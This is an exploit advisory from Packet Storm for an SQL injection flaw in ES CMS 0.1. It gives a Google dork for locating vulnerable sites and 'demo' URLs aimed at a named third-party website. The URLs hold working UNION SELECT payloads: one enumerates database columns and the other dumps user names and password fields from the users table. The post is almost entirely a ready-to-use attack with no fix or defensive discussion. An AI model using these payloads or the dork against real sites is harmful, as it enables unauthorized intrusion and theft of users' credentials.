ES CMS 0.1 SQL Injection

2012-11-25T00:00:00
ID PACKETSTORM:118345
Type packetstorm
Reporter Mr.XpR
Modified 2012-11-25T00:00:00

Description

                                        
                                            `# Exploit Title: ES CmS 0.1 Sql Injection Vulnerability  
  
# Google Dork: inurl:/page.php?id=  
  
# Date: 2012  
  
# Exploit Author: MR.XpR  
  
# Software Link: http://es-cms.com , http://sourceforge.net/projects/escms/files/esCMS Alpha/0.1/escms_alpha_v0_1.zip  
  
# Version: v.0.1  
  
# Tested on: BT , 7  
  
  
# Poc :  
  
http://localhost/page.php?id=[sqli]  
  
  
# D3mo :   
  
http://www.ewastrusinska.com/page.php?id=-1+union+select+1,2,3,group_concat(column_name),5,6+from+information_schema.c​olumns+where+table_name=char(table_cod)  
  
http://www.ewastrusinska.com/page.php?id=-1+union+select+1,2,3,group_concat(nazwa,0x3a,haslo),5,6+from+es_cms_users  
  
  
# TNx To :   
  
My Brothers Siamak.Black(Black.Boy) , UnknowN  
  
everything is not true ,The real is dream  
`